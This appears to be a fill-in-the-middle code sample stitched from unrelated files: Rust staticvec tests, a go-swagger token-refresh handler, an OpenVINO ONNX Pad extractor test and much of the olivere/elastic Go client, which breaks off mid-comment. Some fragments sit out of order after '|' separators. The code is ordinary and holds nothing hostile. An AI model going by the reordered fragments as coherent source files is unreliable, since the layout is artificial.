assert_eq!(
staticvec![1, 2, 3].symmetric_difference(&staticvec![3, 4, 5]),
[1, 2, 4, 5]
);
assert_eq!(
staticvec![501, 502, 503, 504].symmetric_difference(&staticvec![502, 503, 504, 505]),
[501, 505]
);
}
*/
#[test]
fn swap_pop() {
let mut v = staticvec!["foo", "bar", "baz", "qux"];
assert_eq!(v.swap_pop(1).unwrap(), "bar");
assert_eq!(v, ["foo", "qux", "baz"]);
assert_eq!(v.swap_pop(0).unwrap(), "foo");
assert_eq!(v, ["baz", "qux"]);
assert_eq!(v.swap_pop(17), None);
}
#[test]
fn swap_remove() {
let mut v = staticvec!["foo", "bar", "baz", "qux"];
assert_eq!(v.swap_remove(1), "bar");
assert_eq!(v, ["foo", "qux", "baz"]);
assert_eq!(v.swap_remove(0), "foo");
assert_eq!(v, ["baz", "qux"]);
}
#[test]
fn triple() {
static V: StaticVec<usize, 4> = staticvec![4, 5, 6, 7];
assert_eq!(V.triple(), (V.as_ptr(), 4, 4));
}
#[test]
fn triple_mut() {
let mut v = staticvec![4, 5, 6, 7];
let t = v.triple_mut();
assert_eq!(t, (v.as_mut_ptr(), 4, 4));
unsafe { *t.0 = 8 };
assert_eq!(v, [8, 5, 6, 7]);
}
#[test]
fn truncate() {
let mut vec = staticvec![1, 2, 3, 4, 5];
vec.truncate(2);
assert_eq!(vec, [1, 2]);
let mut vec2 = staticvec![1, 2, 3, 4, 5];
vec2.truncate(2);
assert_eq!(vec2, [1, 2]);
let mut vec3 = staticvec![1, 2, 3];
vec3.truncate(0);
assert_eq!(vec3, []);
let mut vec4 = staticvec![1, 2, 3, 4];
vec4.truncate(97);
assert_eq!(vec4.len(), 4);
}
#[test]
fn try_extend_from_slice() {
let mut v = StaticVec::<i32, 3>::from([1, 2, 3]);
assert_eq!(v.try_extend_from_slice(&[2, 3]), Err(CapacityError::<3> {}));
let mut w = StaticVec::<i32, 4>::from([1, 2, 3]);
assert_eq!(w.try_extend_from_slice(&[2]), Ok(()));
}
#[allow(unused_must_use)]
#[test]
fn try_insert() {
let mut vec = staticvec![1, 2, 3, 4, 5];
assert_eq!(vec.try_insert(2, 0), Err(CapacityError::<5> {}));
let mut vec2 = StaticVec::<i32, 4>::new_from_slice(&[1, 2, 3]);
vec2.try_insert(2, 3);
assert_eq!(vec2, [1, 2, 3, 3]);
}
#[test]
fn try_push() {
let mut vec = staticvec![1, 2, 3, 4, 5];
let err = vec.try_push(2).unwrap_err();
assert_eq!(err.into_value(), 2);
let mut vec2 = StaticVec::<i32, 4>::new_from_slice(&[1, 2, 3]);
assert_eq!(vec2.try_push(3), Ok(()));
assert_eq!(vec2, [1, 2, 3, 3]);
}
/*
#[test]
fn union() {
assert_eq!(
staticvec![1, 2, 3].union(&staticvec![4, 2, 3, 4]),
[1, 2, 3, 4],
);
}
*/
#[cfg(feature = "std")]
mod write_tests {
use staticvec::*;
use std::io::{IoSlice, Write};
#[test]
fn write() {
// From arrayvec
let mut v = StaticVec::<u8, 8>::new();
write!(&mut v, "\x01\x02\x03").unwrap();
assert_eq!(&v[..], &[1, 2, 3]);
let r = v.write(&[9; 16]).unwrap();
assert_eq!(r, 5);
assert_eq!(&v[..], &[1, 2, 3, 9, 9, 9, 9, 9]);
}
#[test]
fn write_all() {
let mut v = StaticVec::<u8, 6>::new();
assert!(v.write_all(&[1, 2, 3, 4, 5, 6, 7, 8]).is_err());
v.clear();
assert!(v.write_all(&[1, 2, 3, 4, 5, 6]).is_ok());
}
#[test]
fn write_vectored() {
let mut v = StaticVec::<u8, 8>::new();
assert_eq!(
v.write_vectored(&[IoSlice::new(&[1, 2, 3, 4]), IoSlice::new(&[5, 6, 7, 8])])
.unwrap(),
8
);
assert_eq!(v, [1, 2, 3, 4, 5, 6, 7, 8]);
let mut v2 = StaticVec::<u8, 4>::new();
assert_eq!(
v2.write_vectored(&[IoSlice::new(&[1, 2, 3, 4]), IoSlice::new(&[5, 6, 7, 8])])
.unwrap(),
4
);
assert_eq!(v2, [1, 2, 3, 4]);
}
} | assert_eq!(i4.nth(0).unwrap(), &4);
assert_eq!(i4.nth(0), None);
assert_eq!(i4.nth(0), None); |
token_refresh.go | // Code generated by go-swagger; DO NOT EDIT.
package authentication
// This file was generated by the swagger tool.
// Editing this file might prove futile when you re-run the generate command
import (
"net/http"
"github.com/go-openapi/runtime/middleware"
)
// TokenRefreshHandlerFunc turns a function with the right signature into a token refresh handler
type TokenRefreshHandlerFunc func(TokenRefreshParams) middleware.Responder
// Handle executing the request and returning a response
func (fn TokenRefreshHandlerFunc) Handle(params TokenRefreshParams) middleware.Responder {
return fn(params)
}
// TokenRefreshHandler is an interface that can handle valid token refresh params
type TokenRefreshHandler interface {
Handle(TokenRefreshParams) middleware.Responder
}
// NewTokenRefresh creates a new http.Handler for the token refresh operation
func NewTokenRefresh(ctx *middleware.Context, handler TokenRefreshHandler) *TokenRefresh |
/* TokenRefresh swagger:route GET /auth/token/refresh Authentication tokenRefresh
Refresh token
Refresh expired token.
*/
type TokenRefresh struct {
Context *middleware.Context
Handler TokenRefreshHandler
}
func (o *TokenRefresh) ServeHTTP(rw http.ResponseWriter, r *http.Request) {
route, rCtx, _ := o.Context.RouteInfo(r)
if rCtx != nil {
*r = *rCtx
}
var Params = NewTokenRefreshParams()
if err := o.Context.BindValidRequest(r, route, &Params); err != nil { // bind params
o.Context.Respond(rw, r, route.Produces, route, err)
return
}
res := o.Handler.Handle(Params) // actually handle the request
o.Context.Respond(rw, r, route.Produces, route, res)
}
| {
return &TokenRefresh{Context: ctx, Handler: handler}
} |
pad_ext_test.py | """
Copyright (C) 2018-2020 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from argparse import Namespace
import onnx
from extensions.front.onnx.pad_ext import PadFrontExtractor
from mo.graph.graph import Graph
from mo.utils.unittest.extractors import PB, BaseExtractorsTestingClass
class | (BaseExtractorsTestingClass):
@staticmethod
def _create_node(pads=None, value=None, mode=None):
if pads is None:
pads = [1, 2, 3, 4]
if value is None:
value = 0.0
if mode is None:
mode = 'constant'
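# ONNX lays out the `pads` attribute as [x1_begin, x2_begin, ..., x1_end, x2_end, ...];
# the extractor under test regroups these into per-axis [begin, end] pairs,
# e.g. [1, 2, 3, 4] -> [[1, 3], [2, 4]], as asserted in the tests below.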
pb = onnx.helper.make_node(
'Pad',
pads=pads,
mode=mode,
value=value,
inputs=['a'],
outputs=['b']
)
graph = Graph()
node = PB({'pb': pb, 'graph': graph})
return node
def test_ok(self):
node = self._create_node()
PadFrontExtractor.extract(node)
self.res = node
self.expected = {
'pads': [[1, 3], [2, 4]],
'mode': 'constant',
'fill_value': 0
}
self.compare()
def test_reflect(self):
node = self._create_node(mode='reflect')
PadFrontExtractor.extract(node)
self.res = node
self.expected = {
'pads': [[1, 3], [2, 4]],
'mode': 'reflect',
'fill_value': 0
}
self.compare()
def test_non_zero_fill_value(self):
node = self._create_node(value=1.0)
PadFrontExtractor.extract(node)
self.res = node
self.expected = {
'pads': [[1, 3], [2, 4]],
'mode': 'constant',
'fill_value': 1.0
}
self.compare()
| TestPad |
client.go | // Copyright 2012-present Oliver Eilhard. All rights reserved.
// Use of this source code is governed by a MIT-license.
// See http://olivere.mit-license.org/license.txt for details.
package elastic
import (
"bytes"
"context"
"encoding/json"
"fmt"
"log"
"net/http"
"net/http/httputil"
"net/url"
"os"
"strings"
"sync"
"time"
"github.com/pkg/errors"
"github.com/olivere/elastic/v7/config"
)
const (
// Version is the current version of Elastic.
Version = "7.0.12"
// DefaultURL is the default endpoint of Elasticsearch on the local machine.
// It is used e.g. when initializing a new Client without a specific URL.
DefaultURL = "http://127.0.0.1:9200"
// DefaultScheme is the default protocol scheme to use when sniffing
// the Elasticsearch cluster.
DefaultScheme = "http"
// DefaultHealthcheckEnabled specifies if healthchecks are enabled by default.
DefaultHealthcheckEnabled = true
// DefaultHealthcheckTimeoutStartup is the time the healthcheck waits
// for a response from Elasticsearch on startup, i.e. when creating a
// client. After the client is started, a shorter timeout is commonly used
// (its default is specified in DefaultHealthcheckTimeout).
DefaultHealthcheckTimeoutStartup = 5 * time.Second
// DefaultHealthcheckTimeout specifies the time a running client waits for
// a response from Elasticsearch. Notice that the healthcheck timeout
// when a client is created is larger by default (see DefaultHealthcheckTimeoutStartup).
DefaultHealthcheckTimeout = 1 * time.Second
// DefaultHealthcheckInterval is the default interval between
// two health checks of the nodes in the cluster.
DefaultHealthcheckInterval = 60 * time.Second
// DefaultSnifferEnabled specifies if the sniffer is enabled by default.
DefaultSnifferEnabled = true
// DefaultSnifferInterval is the interval between two sniffing procedures,
// i.e. the lookup of all nodes in the cluster and their addition/removal
// from the list of actual connections.
DefaultSnifferInterval = 15 * time.Minute
// DefaultSnifferTimeoutStartup is the default timeout for the sniffing
// process that is initiated while creating a new client. For subsequent
// sniffing processes, DefaultSnifferTimeout is used (by default).
DefaultSnifferTimeoutStartup = 5 * time.Second
// DefaultSnifferTimeout is the default timeout after which the
// sniffing process times out. Notice that for the initial sniffing
// process, DefaultSnifferTimeoutStartup is used.
DefaultSnifferTimeout = 2 * time.Second
// DefaultSendGetBodyAs is the HTTP method to use when elastic is sending
// a GET request with a body.
DefaultSendGetBodyAs = "GET"
// DefaultGzipEnabled specifies if gzip compression is enabled by default.
DefaultGzipEnabled = false
// off is used to disable timeouts.
off = -1 * time.Second
)
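// Illustrative sketch (not part of the upstream file): the defaults above can
// be overridden via ClientOptionFunc values when constructing a client. The
// URL and the interval/timeout values below are arbitrary example choices.
func exampleClientWithCustomDefaults() (*Client, error) {
	return NewClient(
		SetURL("http://127.0.0.1:9200"),
		SetSnifferInterval(5*time.Minute),      // re-sniff the cluster more often than the 15m default
		SetHealthcheckInterval(30*time.Second), // health-check nodes every 30s instead of every 60s
		SetHealthcheckTimeout(2*time.Second),   // allow each health check a little more time
	)
}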
var (
// ErrNoClient is raised when no Elasticsearch node is available.
ErrNoClient = errors.New("no Elasticsearch node available")
// ErrRetry is raised when a request cannot be executed after the configured
// number of retries.
ErrRetry = errors.New("cannot connect after several retries")
// ErrTimeout is raised when a request timed out, e.g. when WaitForStatus
// didn't return in time.
ErrTimeout = errors.New("timeout")
// noRetries is a retrier that does not retry.
noRetries = NewStopRetrier()
// noDeprecationLog is a no-op for logging deprecations.
noDeprecationLog = func(*http.Request, *http.Response) {}
)
// Doer is an interface to perform HTTP requests.
// It can be used for mocking.
type Doer interface {
Do(*http.Request) (*http.Response, error)
}
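// Illustrative sketch (not part of the upstream file): a canned Doer that can
// stand in for a real HTTP client in tests, e.g. when passed to the client via
// an option such as SetHttpClient. The illustrativeDoer name is hypothetical.
type illustrativeDoer struct {
	resp *http.Response
	err  error
}

// Do satisfies the Doer interface by returning the canned response and error.
func (d illustrativeDoer) Do(*http.Request) (*http.Response, error) {
	return d.resp, d.err
}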
// ClientOptionFunc is a function that configures a Client.
// It is used in NewClient.
type ClientOptionFunc func(*Client) error
// Client is an Elasticsearch client. Create one by calling NewClient.
type Client struct {
c Doer // e.g. a net/*http.Client to use for requests
connsMu sync.RWMutex // connsMu guards the next block
conns []*conn // all connections
cindex int // index into conns
mu sync.RWMutex // guards the next block
urls []string // set of URLs passed initially to the client
running bool // true if the client's background processes are running
errorlog Logger // error log for critical messages
infolog Logger // information log for e.g. response times
tracelog Logger // trace log for debugging
deprecationlog func(*http.Request, *http.Response)
scheme string // http or https
healthcheckEnabled bool // healthchecks enabled or disabled
healthcheckTimeoutStartup time.Duration // time the healthcheck waits for a response from Elasticsearch on startup
healthcheckTimeout time.Duration // time the healthcheck waits for a response from Elasticsearch
healthcheckInterval time.Duration // interval between healthchecks
healthcheckStop chan bool // notify healthchecker to stop, and notify back
snifferEnabled bool // sniffer enabled or disabled
snifferTimeoutStartup time.Duration // time the sniffer waits for a response from nodes info API on startup
snifferTimeout time.Duration // time the sniffer waits for a response from nodes info API
snifferInterval time.Duration // interval between sniffing
snifferCallback SnifferCallback // callback to modify the sniffing decision
snifferStop chan bool // notify sniffer to stop, and notify back
decoder Decoder // used to decode data sent from Elasticsearch
basicAuth bool // indicates whether to send HTTP Basic Auth credentials
basicAuthUsername string // username for HTTP Basic Auth
basicAuthPassword string // password for HTTP Basic Auth
sendGetBodyAs string // override for when sending a GET with a body
gzipEnabled bool // gzip compression enabled or disabled (default)
requiredPlugins []string // list of required plugins
retrier Retrier // strategy for retries
headers http.Header // a list of default headers to add to each request
}
// NewClient creates a new client to work with Elasticsearch.
//
// NewClient, by default, is meant to be long-lived and shared across
// your application. If you need a short-lived client, e.g. for request-scope,
// consider using NewSimpleClient instead.
//
// The caller can configure the new client by passing configuration options
// to the func.
//
// Example:
//
// client, err := elastic.NewClient(
// elastic.SetURL("http://127.0.0.1:9200", "http://127.0.0.1:9201"),
// elastic.SetBasicAuth("user", "secret"))
//
// If no URL is configured, Elastic uses DefaultURL by default.
//
// If the sniffer is enabled (the default), the new client then sniffs
// the cluster via the Nodes Info API
// (see https://www.elastic.co/guide/en/elasticsearch/reference/7.0/cluster-nodes-info.html#cluster-nodes-info).
// It uses the URLs specified by the caller. The caller is responsible for
// passing only URLs of nodes that belong to the same cluster.
// This sniffing process is run on startup and periodically.
// Use SnifferInterval to set the interval between two sniffs (default is
// 15 minutes). In other words: By default, the client will find new nodes
// in the cluster and remove those that are no longer available every
// 15 minutes. Disable the sniffer by passing SetSniff(false) to NewClient.
//
// The list of nodes found in the sniffing process will be used to make
// connections to the REST API of Elasticsearch. These nodes are also
// periodically checked in a shorter time frame. This process is called
// a health check. By default, a health check is done every 60 seconds.
// You can set a shorter or longer interval by SetHealthcheckInterval.
// Disabling health checks is not recommended, but can be done by
// SetHealthcheck(false).
//
// Connections are automatically marked as dead or healthy while
// making requests to Elasticsearch. When a request fails, Elastic will
// call into the Retry strategy which can be specified with SetRetry.
// The Retry strategy is also responsible for handling backoff i.e. the time
// to wait before starting the next request. There are various standard
// backoff implementations, e.g. ExponentialBackoff or SimpleBackoff.
// Retries are disabled by default.
//
// If no HttpClient is configured, then http.DefaultClient is used.
// You can use your own http.Client with some http.Transport for
// advanced scenarios.
//
// An error is also returned when some configuration option is invalid or
// the new client cannot sniff the cluster (if enabled).
func NewClient(options ...ClientOptionFunc) (*Client, error) {
return DialContext(context.Background(), options...)
}
// NewClientFromConfig initializes a client from a configuration.
func NewClientFromConfig(cfg *config.Config) (*Client, error) {
options, err := configToOptions(cfg)
if err != nil {
return nil, err
}
return DialContext(context.Background(), options...)
}
// NewSimpleClient creates a new short-lived Client that can be used in
// use cases where you need e.g. one client per request.
//
// While NewClient by default sets up e.g. periodic health checks
// and sniffing for new nodes in separate goroutines, NewSimpleClient does
// not and is meant as a simple replacement where you don't need all the
// heavy lifting of NewClient.
//
// NewSimpleClient does the following by default: First, all health checks
// are disabled, including timeouts and periodic checks. Second, sniffing
// is disabled, including timeouts and periodic checks. The number of retries
// is set to 1. NewSimpleClient also does not start any goroutines.
//
// Notice that you can still override settings by passing additional options,
// just like with NewClient.
func NewSimpleClient(options ...ClientOptionFunc) (*Client, error) {
c := &Client{
c: http.DefaultClient,
conns: make([]*conn, 0),
cindex: -1,
scheme: DefaultScheme,
decoder: &DefaultDecoder{},
healthcheckEnabled: false,
healthcheckTimeoutStartup: off,
healthcheckTimeout: off,
healthcheckInterval: off,
healthcheckStop: make(chan bool),
snifferEnabled: false,
snifferTimeoutStartup: off,
snifferTimeout: off,
snifferInterval: off,
snifferCallback: nopSnifferCallback,
snifferStop: make(chan bool),
sendGetBodyAs: DefaultSendGetBodyAs,
gzipEnabled: DefaultGzipEnabled,
retrier: noRetries, // no retries by default
deprecationlog: noDeprecationLog,
}
// Run the options on it
for _, option := range options {
if err := option(c); err != nil {
return nil, err
}
}
// Fall back to the default URL if none was given, then normalize the URLs
if len(c.urls) == 0 {
c.urls = []string{DefaultURL}
}
c.urls = canonicalize(c.urls...)
// If the URLs have auth info, use them here as an alternative to SetBasicAuth
if !c.basicAuth {
for _, urlStr := range c.urls {
u, err := url.Parse(urlStr)
if err == nil && u.User != nil {
c.basicAuth = true
c.basicAuthUsername = u.User.Username()
c.basicAuthPassword, _ = u.User.Password()
break
}
}
}
for _, url := range c.urls {
c.conns = append(c.conns, newConn(url, url))
}
// Ensure that we have at least one connection available
if err := c.mustActiveConn(); err != nil {
return nil, err
}
// Check the required plugins
for _, plugin := range c.requiredPlugins {
found, err := c.HasPlugin(plugin)
if err != nil {
return nil, err
}
if !found {
return nil, fmt.Errorf("elastic: plugin %s not found", plugin)
}
}
c.mu.Lock()
c.running = true
c.mu.Unlock()
return c, nil
}
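// exampleNewSimpleClientUsage is an illustrative sketch (not part of the
// upstream API) of using NewSimpleClient for short-lived, request-scoped work.
// The URL below is an assumption; adjust it to your environment.
func exampleNewSimpleClientUsage() error {
    // No sniffing, no health checks, and no background goroutines are started.
    client, err := NewSimpleClient(SetURL("http://127.0.0.1:9200"))
    if err != nil {
        return err
    }
    // Use the client for a single unit of work, e.g. a ping.
    _, _, err = client.Ping("http://127.0.0.1:9200").Do(context.Background())
    return err
}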
// Dial will call DialContext with a background context.
func Dial(options ...ClientOptionFunc) (*Client, error) {
return DialContext(context.Background(), options...)
}
// DialContext will connect to Elasticsearch, just like NewClient does.
//
// The context is honoured in terms of e.g. cancellation.
func DialContext(ctx context.Context, options ...ClientOptionFunc) (*Client, error) {
// Set up the client
c := &Client{
c: http.DefaultClient,
conns: make([]*conn, 0),
cindex: -1,
scheme: DefaultScheme,
decoder: &DefaultDecoder{},
healthcheckEnabled: DefaultHealthcheckEnabled,
healthcheckTimeoutStartup: DefaultHealthcheckTimeoutStartup,
healthcheckTimeout: DefaultHealthcheckTimeout,
healthcheckInterval: DefaultHealthcheckInterval,
healthcheckStop: make(chan bool),
snifferEnabled: DefaultSnifferEnabled,
snifferTimeoutStartup: DefaultSnifferTimeoutStartup,
snifferTimeout: DefaultSnifferTimeout,
snifferInterval: DefaultSnifferInterval,
snifferCallback: nopSnifferCallback,
snifferStop: make(chan bool),
sendGetBodyAs: DefaultSendGetBodyAs,
gzipEnabled: DefaultGzipEnabled,
retrier: noRetries, // no retries by default
deprecationlog: noDeprecationLog,
}
// Run the options on it
for _, option := range options {
if err := option(c); err != nil {
return nil, err
}
}
// Fall back to the default URL if none was given, then normalize the URLs
if len(c.urls) == 0 {
c.urls = []string{DefaultURL}
}
c.urls = canonicalize(c.urls...)
// If the URLs have auth info, use them here as an alternative to SetBasicAuth
if !c.basicAuth {
for _, urlStr := range c.urls {
u, err := url.Parse(urlStr)
if err == nil && u.User != nil {
c.basicAuth = true
c.basicAuthUsername = u.User.Username()
c.basicAuthPassword, _ = u.User.Password()
break
}
}
}
// Check if we can make a request to any of the specified URLs
if c.healthcheckEnabled {
if err := c.startupHealthcheck(ctx, c.healthcheckTimeoutStartup); err != nil {
return nil, err
}
}
if c.snifferEnabled {
// Sniff the cluster initially
if err := c.sniff(ctx, c.snifferTimeoutStartup); err != nil {
return nil, err
}
} else {
// Do not sniff the cluster initially. Use the provided URLs instead.
for _, url := range c.urls {
c.conns = append(c.conns, newConn(url, url))
}
}
if c.healthcheckEnabled {
// Perform an initial health check
c.healthcheck(ctx, c.healthcheckTimeoutStartup, true)
}
// Ensure that we have at least one connection available
if err := c.mustActiveConn(); err != nil {
return nil, err
}
// Check the required plugins
for _, plugin := range c.requiredPlugins {
found, err := c.HasPlugin(plugin)
if err != nil {
return nil, err
}
if !found {
return nil, fmt.Errorf("elastic: plugin %s not found", plugin)
}
}
if c.snifferEnabled {
go c.sniffer() // periodically update cluster information
}
if c.healthcheckEnabled {
go c.healthchecker() // start goroutine to periodically ping all nodes of the cluster
}
c.mu.Lock()
c.running = true
c.mu.Unlock()
return c, nil
}
// DialWithConfig will use the configuration settings parsed from config package
// to connect to Elasticsearch.
//
// The context is honoured in terms of e.g. cancellation.
func DialWithConfig(ctx context.Context, cfg *config.Config) (*Client, error) {
options, err := configToOptions(cfg)
if err != nil {
return nil, err
}
return DialContext(ctx, options...)
}
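// exampleDialWithConfigUsage is an illustrative sketch (not part of the
// upstream API) of driving DialWithConfig from a config.Config. Only fields
// handled by configToOptions are set; the URL and the field types are
// inferred from that function, and the values are assumptions.
func exampleDialWithConfigUsage(ctx context.Context) (*Client, error) {
    sniff := false
    cfg := &config.Config{
        URL:   "http://127.0.0.1:9200",
        Sniff: &sniff, // disable sniffing, e.g. for a single-node setup
    }
    return DialWithConfig(ctx, cfg)
}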
func configToOptions(cfg *config.Config) ([]ClientOptionFunc, error) {
var options []ClientOptionFunc
if cfg != nil {
if cfg.URL != "" {
options = append(options, SetURL(cfg.URL))
}
if cfg.Errorlog != "" {
f, err := os.OpenFile(cfg.Errorlog, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644)
if err != nil {
return nil, errors.Wrap(err, "unable to initialize error log")
}
l := log.New(f, "", 0)
options = append(options, SetErrorLog(l))
}
if cfg.Tracelog != "" {
f, err := os.OpenFile(cfg.Tracelog, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644)
if err != nil {
return nil, errors.Wrap(err, "unable to initialize trace log")
}
l := log.New(f, "", 0)
options = append(options, SetTraceLog(l))
}
if cfg.Infolog != "" {
f, err := os.OpenFile(cfg.Infolog, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644)
if err != nil {
return nil, errors.Wrap(err, "unable to initialize info log")
}
l := log.New(f, "", 0)
options = append(options, SetInfoLog(l))
}
if cfg.Username != "" || cfg.Password != "" {
options = append(options, SetBasicAuth(cfg.Username, cfg.Password))
}
if cfg.Sniff != nil {
options = append(options, SetSniff(*cfg.Sniff))
}
if cfg.Healthcheck != nil {
options = append(options, SetHealthcheck(*cfg.Healthcheck))
}
}
return options, nil
}
// SetHttpClient can be used to specify the http.Client to use when making
// HTTP requests to Elasticsearch.
func SetHttpClient(httpClient Doer) ClientOptionFunc {
return func(c *Client) error {
if httpClient != nil {
c.c = httpClient
} else {
c.c = http.DefaultClient
}
return nil
}
}
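// exampleSetHttpClientUsage is an illustrative sketch (not part of the
// upstream API) of supplying a custom *http.Client, e.g. to tune the
// transport. The transport and timeout settings below are arbitrary examples.
func exampleSetHttpClientUsage() (*Client, error) {
    httpClient := &http.Client{
        Transport: &http.Transport{MaxIdleConnsPerHost: 16},
        Timeout:   10 * time.Second,
    }
    return NewClient(SetHttpClient(httpClient))
}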
// SetBasicAuth can be used to specify the HTTP Basic Auth credentials to
// use when making HTTP requests to Elasticsearch.
func SetBasicAuth(username, password string) ClientOptionFunc |
// SetURL defines the URL endpoints of the Elasticsearch nodes. Notice that
// when sniffing is enabled, these URLs are used to initially sniff the
// cluster on startup.
func SetURL(urls ...string) ClientOptionFunc {
return func(c *Client) error {
switch len(urls) {
case 0:
c.urls = []string{DefaultURL}
default:
c.urls = urls
}
return nil
}
}
// SetScheme sets the HTTP scheme to look for when sniffing (http or https).
// This is http by default.
func SetScheme(scheme string) ClientOptionFunc {
return func(c *Client) error {
c.scheme = scheme
return nil
}
}
// SetSniff enables or disables the sniffer (enabled by default).
func SetSniff(enabled bool) ClientOptionFunc {
return func(c *Client) error {
c.snifferEnabled = enabled
return nil
}
}
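// exampleSetSniffUsage is an illustrative sketch (not part of the upstream
// API): disabling sniffing (and health checks) is a common setup when the
// cluster sits behind a proxy or runs as a single node. The URL is an assumption.
func exampleSetSniffUsage() (*Client, error) {
    return NewClient(
        SetURL("http://127.0.0.1:9200"),
        SetSniff(false),
        SetHealthcheck(false),
    )
}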
// SetSnifferTimeoutStartup sets the timeout for the sniffer that is used
// when creating a new client. The default is 5 seconds. Notice that the
// timeout being used for subsequent sniffing processes is set with
// SetSnifferTimeout.
func SetSnifferTimeoutStartup(timeout time.Duration) ClientOptionFunc {
return func(c *Client) error {
c.snifferTimeoutStartup = timeout
return nil
}
}
// SetSnifferTimeout sets the timeout for the sniffer that finds the
// nodes in a cluster. The default is 2 seconds. Notice that the timeout
// used when creating a new client on startup is usually greater and can
// be set with SetSnifferTimeoutStartup.
func SetSnifferTimeout(timeout time.Duration) ClientOptionFunc {
return func(c *Client) error {
c.snifferTimeout = timeout
return nil
}
}
// SetSnifferInterval sets the interval between two sniffing processes.
// The default interval is 15 minutes.
func SetSnifferInterval(interval time.Duration) ClientOptionFunc {
return func(c *Client) error {
c.snifferInterval = interval
return nil
}
}
// SnifferCallback defines the protocol for sniffing decisions.
type SnifferCallback func(*NodesInfoNode) bool
// nopSnifferCallback is the default sniffer callback: It accepts
// all nodes the sniffer finds.
var nopSnifferCallback = func(*NodesInfoNode) bool { return true }
// SetSnifferCallback allows the caller to modify sniffer decisions.
// When setting the callback, the given SnifferCallback is called for
// each (healthy) node found during the sniffing process.
// If the callback returns false, the node is ignored: No requests
// are routed to it.
func SetSnifferCallback(f SnifferCallback) ClientOptionFunc {
return func(c *Client) error {
if f != nil {
c.snifferCallback = f
}
return nil
}
}
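// exampleSetSnifferCallbackUsage is an illustrative sketch (not part of the
// upstream API): the callback below only admits nodes that expose an HTTP
// publish address, mirroring the check done in sniffNode.
func exampleSetSnifferCallbackUsage() (*Client, error) {
    cb := func(node *NodesInfoNode) bool {
        // Ignore nodes without an HTTP publish address.
        return node.HTTP != nil && len(node.HTTP.PublishAddress) > 0
    }
    return NewClient(SetSnifferCallback(cb))
}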
// SetHealthcheck enables or disables healthchecks (enabled by default).
func SetHealthcheck(enabled bool) ClientOptionFunc {
return func(c *Client) error {
c.healthcheckEnabled = enabled
return nil
}
}
// SetHealthcheckTimeoutStartup sets the timeout for the initial health check.
// The default timeout is 5 seconds (see DefaultHealthcheckTimeoutStartup).
// Notice that timeouts for subsequent health checks can be modified with
// SetHealthcheckTimeout.
func SetHealthcheckTimeoutStartup(timeout time.Duration) ClientOptionFunc {
return func(c *Client) error {
c.healthcheckTimeoutStartup = timeout
return nil
}
}
// SetHealthcheckTimeout sets the timeout for periodic health checks.
// The default timeout is 1 second (see DefaultHealthcheckTimeout).
// Notice that a different (usually larger) timeout is used for the initial
// healthcheck, which is initiated while creating a new client.
// The startup timeout can be modified with SetHealthcheckTimeoutStartup.
func SetHealthcheckTimeout(timeout time.Duration) ClientOptionFunc {
return func(c *Client) error {
c.healthcheckTimeout = timeout
return nil
}
}
// SetHealthcheckInterval sets the interval between two health checks.
// The default interval is 60 seconds.
func SetHealthcheckInterval(interval time.Duration) ClientOptionFunc {
return func(c *Client) error {
c.healthcheckInterval = interval
return nil
}
}
// SetMaxRetries sets the maximum number of retries before giving up when
// performing an HTTP request to Elasticsearch.
//
// Deprecated: Replace with a Retry implementation.
func SetMaxRetries(maxRetries int) ClientOptionFunc {
return func(c *Client) error {
if maxRetries < 0 {
return errors.New("MaxRetries must be greater than or equal to 0")
} else if maxRetries == 0 {
c.retrier = noRetries
} else {
// Create a Retrier that will wait for 100ms (+/- jitter) between requests.
// This resembles the old behavior with maxRetries.
ticks := make([]int, maxRetries)
for i := 0; i < len(ticks); i++ {
ticks[i] = 100
}
backoff := NewSimpleBackoff(ticks...)
c.retrier = NewBackoffRetrier(backoff)
}
return nil
}
}
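// exampleRetrierUsage is an illustrative sketch (not part of the upstream
// API) of the replacement recommended by the deprecation note above:
// configure a Retrier explicitly. The backoff ticks (in milliseconds) are
// arbitrary example values.
func exampleRetrierUsage() (*Client, error) {
    retrier := NewBackoffRetrier(NewSimpleBackoff(100, 200, 400))
    return NewClient(SetRetrier(retrier))
}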
// SetGzip enables or disables gzip compression (disabled by default).
func SetGzip(enabled bool) ClientOptionFunc {
return func(c *Client) error {
c.gzipEnabled = enabled
return nil
}
}
// SetDecoder sets the Decoder to use when decoding data from Elasticsearch.
// DefaultDecoder is used by default.
func SetDecoder(decoder Decoder) ClientOptionFunc {
return func(c *Client) error {
if decoder != nil {
c.decoder = decoder
} else {
c.decoder = &DefaultDecoder{}
}
return nil
}
}
// SetRequiredPlugins can be used to indicate that some plugins are required
// before a Client will be created.
func SetRequiredPlugins(plugins ...string) ClientOptionFunc {
return func(c *Client) error {
if c.requiredPlugins == nil {
c.requiredPlugins = make([]string, 0)
}
c.requiredPlugins = append(c.requiredPlugins, plugins...)
return nil
}
}
// SetErrorLog sets the logger for critical messages like nodes joining
// or leaving the cluster or failing requests. It is nil by default.
func SetErrorLog(logger Logger) ClientOptionFunc {
return func(c *Client) error {
c.errorlog = logger
return nil
}
}
// SetInfoLog sets the logger for informational messages, e.g. requests
// and their response times. It is nil by default.
func SetInfoLog(logger Logger) ClientOptionFunc {
return func(c *Client) error {
c.infolog = logger
return nil
}
}
// SetTraceLog specifies the log.Logger to use for output of HTTP requests
// and responses, which is helpful during debugging. It is nil by default.
func SetTraceLog(logger Logger) ClientOptionFunc {
return func(c *Client) error {
c.tracelog = logger
return nil
}
}
// SetSendGetBodyAs specifies the HTTP method to use when sending a GET request
// with a body. It is GET by default.
func SetSendGetBodyAs(httpMethod string) ClientOptionFunc {
return func(c *Client) error {
c.sendGetBodyAs = httpMethod
return nil
}
}
// SetRetrier specifies the retry strategy that handles errors during
// HTTP request/response with Elasticsearch.
func SetRetrier(retrier Retrier) ClientOptionFunc {
return func(c *Client) error {
if retrier == nil {
retrier = noRetries // no retries by default
}
c.retrier = retrier
return nil
}
}
// SetHeaders adds a list of default HTTP headers that will be added to
// each request executed by PerformRequest.
func SetHeaders(headers http.Header) ClientOptionFunc {
return func(c *Client) error {
c.headers = headers
return nil
}
}
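// exampleSetHeadersUsage is an illustrative sketch (not part of the upstream
// API): default headers are attached to every request issued through
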